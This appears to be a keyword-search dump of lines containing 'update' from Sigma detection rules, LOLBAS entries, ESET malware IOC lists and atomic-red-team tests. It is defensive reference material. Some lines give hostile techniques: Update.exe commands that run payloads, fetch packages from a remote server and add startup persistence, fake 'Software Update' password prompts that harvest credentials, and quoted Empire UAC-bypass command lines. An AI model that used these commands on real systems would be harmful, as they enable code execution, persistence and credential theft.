sigma |
av_printernightmare_cve_2021_34527.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 |
DRL 1.0 |
sigma |
av_printernightmare_cve_2021_34527.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
sigma |
rpc_firewall_efs_abuse.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942 |
DRL 1.0 |
sigma |
rpc_firewall_printing_lateral_movement.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
sigma |
azure_aadhybridhealth_adfs_new_server.yml |
This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. |
DRL 1.0 |
sigma |
azure_app_credential_modification.yml |
properties.message: 'Update application - Certificates and secrets management' |
DRL 1.0 |
sigma |
azure_device_or_configuration_modified_or_deleted.yml |
- Update device |
DRL 1.0 |
sigma |
azure_device_or_configuration_modified_or_deleted.yml |
- Update device configuration |
DRL 1.0 |
sigma |
azure_keyvault_key_modified_or_deleted.yml |
- MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION |
DRL 1.0 |
sigma |
azure_keyvault_secrets_modified_or_deleted.yml |
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION |
DRL 1.0 |
sigma |
gcp_bucket_modified_or_deleted.yml |
- storage.buckets.update |
DRL 1.0 |
sigma |
gcp_dns_zone_modified_or_deleted.yml |
- Dns.ManagedZones.Update |
DRL 1.0 |
sigma |
gcp_firewall_rule_modified_or_deleted.yml |
- v*.Compute.Firewalls.Update |
DRL 1.0 |
sigma |
gcp_kubernetes_rolebinding.yml |
- io.k8s.authorization.rbac.v*.clusterrolebindings.update |
DRL 1.0 |
sigma |
gcp_kubernetes_rolebinding.yml |
- io.k8s.authorization.rbac.v*.rolebindings.update |
DRL 1.0 |
sigma |
gcp_kubernetes_secrets_modified_or_deleted.yml |
- io.k8s.core.v*.secrets.update |
DRL 1.0 |
sigma |
gcp_service_account_modified.yml |
- .serviceAccounts.update |
DRL 1.0 |
sigma |
gcp_sql_database_modified_or_deleted.yml |
- https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update |
DRL 1.0 |
sigma |
gcp_sql_database_modified_or_deleted.yml |
- cloudsql.users.update |
DRL 1.0 |
sigma |
okta_application_modified_or_deleted.yml |
- application.lifecycle.update |
DRL 1.0 |
sigma |
okta_application_sign_on_policy_modified_or_deleted.yml |
- application.policy.sign_on.update |
DRL 1.0 |
sigma |
okta_policy_modified_or_deleted.yml |
- policy.lifecycle.update |
DRL 1.0 |
sigma |
okta_policy_rule_modified_or_deleted.yml |
- policy.rule.update |
DRL 1.0 |
sigma |
proc_creation_lnx_install_root_certificate.yml |
- '/update-ca-certificates' |
DRL 1.0 |
sigma |
proc_creation_lnx_install_root_certificate.yml |
- '/update-ca-trust' |
DRL 1.0 |
sigma |
zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 |
DRL 1.0 |
sigma |
zeek_dce_rpc_printnightmare_print_driver_install.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
sigma |
zeek_smb_converted_win_lm_namedpipe.yml |
- update the excluded named pipe to filter out any newly observed legit named pipe |
DRL 1.0 |
sigma |
proxy_susp_flash_download_loc.yml |
title: Flash Player Update from Suspicious Location |
DRL 1.0 |
sigma |
proxy_susp_flash_download_loc.yml |
description: Detects a flashplayer update from an unofficial location |
DRL 1.0 |
sigma |
proxy_ua_apt.yml |
- 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ |
DRL 1.0 |
sigma |
proxy_ua_bitsadmin_susp_tld.yml |
- Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca |
DRL 1.0 |
sigma |
proxy_ua_frameworks.yml |
# Metasploit Update by Florian Roth 08.07.2017 |
DRL 1.0 |
sigma |
win_exchange_cve_2021_42321.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 |
DRL 1.0 |
sigma |
win_lm_namedpipe.yml |
- update the excluded named pipe to filter out any newly observed legit named pipe |
DRL 1.0 |
sigma |
win_security_mal_service_installs.yml |
author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
DRL 1.0 |
sigma |
win_susp_lsass_dump_generic.yml |
author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) |
DRL 1.0 |
sigma |
win_susp_lsass_dump_generic.yml |
- Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
title: Windows Update Error |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
description: Windows Update reported an error; check whether a 0-day KB is needed |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
- 20 # Installation Failure: Windows failed to install the following update with error |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
- 24 # Uninstallation Failure: Windows failed to uninstall the following update with error |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
- 213 # Revert Failure: Windows failed to revert the following update with error |
DRL 1.0 |
sigma |
win_susp_system_update_error.yml |
- 217 # Commit Failure: Windows failed to commit the following update with error |
DRL 1.0 |
sigma |
sysmon_rclone_execution.yml |
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
DRL 1.0 |
sigma |
driver_load_vuln_dell_driver.yml |
title: Vulnerable Dell BIOS Update Driver Load |
DRL 1.0 |
sigma |
driver_load_vuln_dell_driver.yml |
description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 |
DRL 1.0 |
sigma |
file_event_win_powershell_exploit_scripts.yml |
- '\Remove-Update.ps1' |
DRL 1.0 |
sigma |
image_load_susp_system_drawing_load.yml |
- 'C:\Users\\*\GitHubDesktop\Update.exe' |
DRL 1.0 |
sigma |
net_connection_win_wuauclt_network_connection.yml |
description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and make a network connection. One could easily make the DLL spawn a new process and inject into it to proxy the network connection and bypass this rule. |
DRL 1.0 |
sigma |
pipe_created_mal_cobaltstrike_re.yml |
- PipeName|re: '\\\\windows\.update\.manager[0-9a-f]{2,3}' |
DRL 1.0 |
sigma |
pipe_created_susp_cobaltstrike_pipe_patterns.yml |
- '\windows.update.manager' |
DRL 1.0 |
sigma |
posh_ps_malicious_commandlets.yml |
author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) |
DRL 1.0 |
sigma |
posh_ps_malicious_commandlets.yml |
- 'Remove-Update' |
DRL 1.0 |
sigma |
posh_ps_nishang_malicious_commandlets.yml |
- Remove-Update |
DRL 1.0 |
sigma |
proc_access_win_cred_dump_lsass_access.yml |
oscd.community (update) |
DRL 1.0 |
sigma |
proc_access_win_in_memory_assembly_execution.yml |
- '\GitHubDesktop\Update.exe' |
DRL 1.0 |
sigma |
proc_creation_win_apt_revil_kaseya.yml |
- https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ |
DRL 1.0 |
sigma |
proc_creation_win_dsim_remove.yml |
description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images |
DRL 1.0 |
sigma |
proc_creation_win_etw_trace_evasion.yml |
- 'update' |
DRL 1.0 |
sigma |
proc_creation_win_exploit_cve_2019_1378.yml |
- https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua |
DRL 1.0 |
sigma |
proc_creation_win_lolbas_execution_of_wuauclt.yml |
description: Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL. |
DRL 1.0 |
sigma |
proc_creation_win_lolbas_execution_of_wuauclt.yml |
- Wuaueng.dll which is a module belonging to Microsoft Windows Update. |
DRL 1.0 |
sigma |
proc_creation_win_msiexec_execute_dll.yml |
- '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' |
DRL 1.0 |
sigma |
proc_creation_win_msiexec_execute_dll.yml |
- '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' |
DRL 1.0 |
sigma |
proc_creation_win_proxy_execution_wuauclt.yml |
description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code. |
DRL 1.0 |
sigma |
proc_creation_win_proxy_execution_wuauclt.yml |
- https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ |
DRL 1.0 |
sigma |
proc_creation_win_rasautou_dll_execution.yml |
definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) |
DRL 1.0 |
sigma |
proc_creation_win_renamed_jusched.yml |
Description: Java Update Scheduler |
DRL 1.0 |
sigma |
proc_creation_win_renamed_jusched.yml |
Description: Java(TM) Update Scheduler |
DRL 1.0 |
sigma |
proc_creation_win_susp_control_cve_2021_40444.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 |
DRL 1.0 |
sigma |
proc_creation_win_susp_powershell_empire_uac_bypass.yml |
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)' |
DRL 1.0 |
sigma |
proc_creation_win_susp_powershell_empire_uac_bypass.yml |
- ' -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);' |
DRL 1.0 |
sigma |
proc_creation_win_susp_rclone_execution.yml |
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
DRL 1.0 |
sigma |
proc_creation_win_susp_squirrel_lolbin.yml |
Image|endswith: '\update.exe' # Check if folder Name matches executed binary \\(?P<first>[^\\]*)\\Update.*Start.{2}(?P<second>\1)\.exe (example: https://regex101.com/r/SGSQGz/2) |
DRL 1.0 |
sigma |
proc_creation_win_susp_squirrel_lolbin.yml |
- '\AppData\Local\Discord\Update.exe' |
DRL 1.0 |
sigma |
proc_creation_win_susp_wuauclt.yml |
title: Windows Update Client LOLBIN |
DRL 1.0 |
sigma |
proc_creation_win_susp_wuauclt.yml |
description: Detects code execution via the Windows Update client (wuauclt) |
DRL 1.0 |
sigma |
proc_creation_win_susp_wuauclt_cmdline.yml |
title: Suspicious Windows Update Agent Empty Cmdline |
DRL 1.0 |
sigma |
proc_creation_win_susp_wuauclt_cmdline.yml |
description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags |
DRL 1.0 |
sigma |
proc_creation_win_uac_bypass_ntfs_reparse_point.yml |
CommandLine|endswith: '\AppData\Local\Temp\update.msu' |
DRL 1.0 |
sigma |
registry_event_asep_reg_keys_modification_currentversion.yml |
- '\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe' # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe |
DRL 1.0 |
sigma |
registry_event_office_enable_dde.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 |
DRL 1.0 |
sigma |
registry_event_taskcache_entry.yml |
- '\TaskCache\Tree\OneDrive Standalone Update Task' |
DRL 1.0 |
sigma |
registry_event_taskcache_entry.yml |
- '\TaskCache\Tree\Mozilla\Firefox Background Update ' |
DRL 1.0 |
sigma |
registry_event_wdigest_enable_uselogoncredential.yml |
- https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 |
DRL 1.0 |
sigma |
sysmon_config_modification_error.yml |
- 'Failed to connect to the driver to update configuration' |
DRL 1.0 |
sigma |
win_apt_apt29_tor.yml |
title: APT29 Google Update Service Install |
DRL 1.0 |
sigma |
win_apt_apt29_tor.yml |
description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe |
DRL 1.0 |
sigma |
win_apt_apt29_tor.yml |
ServiceName: 'Google Update' |
DRL 1.0 |
sigma |
win_mal_service_installs.yml |
author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
DRL 1.0 |
sigma |
win_remote_schtask.yml |
description: Detects remote execution via scheduled task creation or update on the destination host |
DRL 1.0 |
sigma |
ecs-zeek-elastic-beats-implementation.yml |
nextUpdate: zeek.ocsp.update.next |
DRL 1.0 |
sigma |
ecs-zeek-elastic-beats-implementation.yml |
thisUpdate: zeek.ocsp.update.this |
DRL 1.0 |
LOLBAS |
gh-pages.yml |
name: Update LOLBAS-Project.github.io |
|
LOLBAS |
gh-pages.yml |
commit_message: "Applying update " |
|
LOLBAS |
Upload.yml |
Name: Update.exe |
|
LOLBAS |
Upload.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. |
|
LOLBAS |
Upload.yml |
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" |
|
LOLBAS |
Upload.yml |
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. |
|
LOLBAS |
Upload.yml |
- Path: '%localappdata%\Whatsapp\Update.exe' |
|
LOLBAS |
Upload.yml |
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' |
|
LOLBAS |
Cmdl32.yml |
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update |
|
LOLBAS |
Pktmon.yml |
Description: Capture network packets on Windows 10 with the October 2018 Update or later. |
|
LOLBAS |
Wuauclt.yml |
Description: Windows Update Client |
|
LOLBAS |
Squirrel.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. |
|
LOLBAS |
Squirrel.yml |
- Command: squirrel.exe --update [url to package] |
|
LOLBAS |
Squirrel.yml |
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 |
|
LOLBAS |
Update.yml |
Name: Update.exe |
|
LOLBAS |
Update.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. |
|
LOLBAS |
Update.yml |
- Command: Update.exe --download [url to package] |
|
LOLBAS |
Update.yml |
- Command: Update.exe --update=[url to package] |
|
LOLBAS |
Update.yml |
- Command: Update.exe --update=\\remoteserver\payloadFolder |
|
LOLBAS |
Update.yml |
- Command: Update.exe --updateRollback=[url to package] |
|
LOLBAS |
Update.yml |
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" |
|
LOLBAS |
Update.yml |
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. |
|
LOLBAS |
Update.yml |
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder |
|
LOLBAS |
Update.yml |
- Command: Update.exe --createShortcut=payload.exe -l=Startup |
|
LOLBAS |
Update.yml |
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. |
|
LOLBAS |
Update.yml |
- Command: Update.exe --removeShortcut=payload.exe -l=Startup |
|
LOLBAS |
Update.yml |
- Path: '%localappdata%\Microsoft\Teams\update.exe' |
|
LOLBAS |
Update.yml |
- IOC: Update.exe spawned an unknown process |
|
LOLBAS |
Update.yml |
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 |
|
malware-ioc |
attor |
Adobe Acrobat Update v3.17.lkws |
© ESET 2014-2018 |
malware-ioc |
attor |
Adobe Acrobat Update Service v3.2.muitnl |
© ESET 2014-2018 |
malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\s3x |
© ESET 2014-2018 |
malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\d5l |
© ESET 2014-2018 |
malware-ioc |
attor |
=== Update folder paths |
© ESET 2014-2018 |
malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\v1e |
© ESET 2014-2018 |
malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\k7f |
© ESET 2014-2018 |
malware-ioc |
casbaneiro |
=== Campaign 1: Fishy financial manager update |
© ESET 2014-2018 |
malware-ioc |
cdrthief |
==== Files created during malware update |
© ESET 2014-2018 |
malware-ioc |
evilnum |
https://api.adobe.com[.]kz/update/check |
© ESET 2014-2018 |
malware-ioc |
evilnum |
== February 2021 Pyvil and Evilnum Update |
© ESET 2014-2018 |
malware-ioc |
evilnum |
These are the IOCs for our https://twitter.com/ESETresearch[update on @ESETresearch twitter]. |
© ESET 2014-2018 |
malware-ioc |
evilnum |
| AF5F9CD45757F928E5BCC6F50BCD62AAB50119C1 | fsnotifier32.exe | Google Update Core | 14FDFFEB640F897C120870155F7FB2C8EA62AF44 |
© ESET 2014-2018 |
malware-ioc |
invisimole.yar |
$s17 = "update.xn--6frz82g" ascii wide |
© ESET 2014-2018 |
malware-ioc |
invisimole.yar |
$s25 = "update.xn--6frz82g" ascii wide |
© ESET 2014-2018 |
malware-ioc |
misp_invisimole.json |
"value": "update.xn--6frz82g", |
© ESET 2014-2018 |
malware-ioc |
invisimole |
* update[.]xn--6frz82g |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\armsvc.exe", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\firewall.exe", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\ADelRCP.exe", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\SystemArchitectureTranslation.exe", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\libstringutils.dll", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\settings.cfg", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Setup.dll", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Updater.exe", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\setup-version.json", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\client-version.dll", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup\\", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup.log", |
© ESET 2014-2018 |
malware-ioc |
misp-kryptocibule.json |
"value": "Adobe Update Task", |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\ADelRCP.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\SystemArchitectureTranslation.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\libstringutils.dll |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\settings.cfg |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Setup.dll |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Updater.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\setup-version.json |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\client-version.dll |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup\ |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup.log |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
|Adobe Update Task| %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
Identity Service, in, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
Identity Service, out, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
Java Runtime Update, in, allow, %LocalAppData%\Java Runtime\transmission-remote.exe |
© ESET 2014-2018 |
malware-ioc |
kryptocibule |
Java Runtime Update, out, allow, %LocalAppData%\Java Runtime\transmission-remote.exe |
© ESET 2014-2018 |
malware-ioc |
moose |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
malware-ioc |
nightscout |
=== Malicious Update variant 1 |
© ESET 2014-2018 |
malware-ioc |
nightscout |
=== Malicious Update variant 2 |
© ESET 2014-2018 |
malware-ioc |
nightscout |
=== Malicious Update variant 3 |
© ESET 2014-2018 |
malware-ioc |
nightscout |
=== Malicious Update variant 4 |
© ESET 2014-2018 |
malware-ioc |
nightscout |
update.boshiamys[.]com |
© ESET 2014-2018 |
malware-ioc |
nightscout |
=== Malicious update URLs |
© ESET 2014-2018 |
malware-ioc |
nukesped_lazarus |
. Update.exe |
© ESET 2014-2018 |
malware-ioc |
oceanlotus |
== OceanLotus : macOS backdoor update |
© ESET 2014-2018 |
malware-ioc |
oceanlotus |
For a description of OceanLotus' latest macOS update |
© ESET 2014-2018 |
malware-ioc |
oceanlotus |
https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/[OceanLotus article]. |
© ESET 2014-2018 |
malware-ioc |
potao |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
malware-ioc |
2020_Q2 |
== Operation In(ter)ception Update |
© ESET 2014-2018 |
malware-ioc |
2020_Q3 |
- ++http://www.maxscript.cc/update/upscript[.]mse++ |
© ESET 2014-2018 |
malware-ioc |
2020_Q4 |
update.npicgames[.]com |
© ESET 2014-2018 |
malware-ioc |
2021_T2 |
library-update[.]com |
© ESET 2014-2018 |
malware-ioc |
rtm |
Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host |
© ESET 2014-2018 |
malware-ioc |
rtm |
Windows Update |
© ESET 2014-2018 |
malware-ioc |
sparklinggoblin |
- ++update.facebookint.workers[.]dev++ |
© ESET 2014-2018 |
malware-ioc |
sshdoor |
|Hash (SHA-1) |UUID |C&C |URL to update C&C| Backdoor password |
© ESET 2014-2018 |
malware-ioc |
stantinko |
|Stantinko Installer | udservice.exe | update.ultimate-discounter[.]com |
© ESET 2014-2018 |
malware-ioc |
stantinko |
HKLM\SYSTEM\CurrentControlSet\services\Coupons Browser Update Service\ |
© ESET 2014-2018 |
malware-ioc |
stantinko.misp-event.json |
"value": "update.ultimate-discounter.com|178.20.159.56", |
© ESET 2014-2018 |
malware-ioc |
stantinko.misp-event.json |
"value": "HKLM\\SYSTEM\\CurrentControlSet\\services\\Coupons Browser Update Service\\", |
© ESET 2014-2018 |
malware-ioc |
misp-mosquito-event.json |
"value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x32", |
© ESET 2014-2018 |
malware-ioc |
misp-mosquito-event.json |
"value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x64", |
© ESET 2014-2018 |
malware-ioc |
turla |
** FSStorage::Update |
© ESET 2014-2018 |
malware-ioc |
turla |
** RegStorage::Update |
© ESET 2014-2018 |
malware-ioc |
turla |
- ++http://get.adobe[.]com/flashplayer/download/update/x32++ |
© ESET 2014-2018 |
malware-ioc |
turla |
- ++http://get.adobe[.]com/flashplayer/download/update/x64++ |
© ESET 2014-2018 |
malware-ioc |
windigo |
*UPDATE 2017-10-30*: This document now contains the latest IOCs for version |
© ESET 2014-2018 |
malware-ioc |
windigo |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
malware-ioc |
windigo |
*UPDATE*: As we expected, the malicious group is monitoring our indicators of |
© ESET 2014-2018 |
malware-ioc |
gaming_supply_chain.misp_event.json |
"comment": "2nd stage update server (HTTP)", |
© ESET 2014-2018 |
malware-ioc |
gaming_supply_chain.misp_event.json |
"description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)", |
© ESET 2014-2018 |
malware-ioc |
winnti_group |
\| checkin.travelsanignacio.com \| Second stage update server |
© ESET 2014-2018 |
atomic-red-team |
T1056.002.md |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1056.002.md |
$cred = $host.UI.PromptForCredential('Windows Security Update', '', [Environment]::UserName, [Environment]::UserDomainName) |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1070.md |
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1110.001.md |
apt-get update && apt-get install -y openssl sudo |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1110.001.md |
yum -y update && yum install -y openssl sudo |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1110.004.md |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1176.md |
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1543.002.md |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubuntu, Kali or CentOS" ; fi ; |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.001.md |
| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1553.004.md |
update-ca-trust |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1553.004.md |
echo sudo update-ca-certificates |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.008.md |
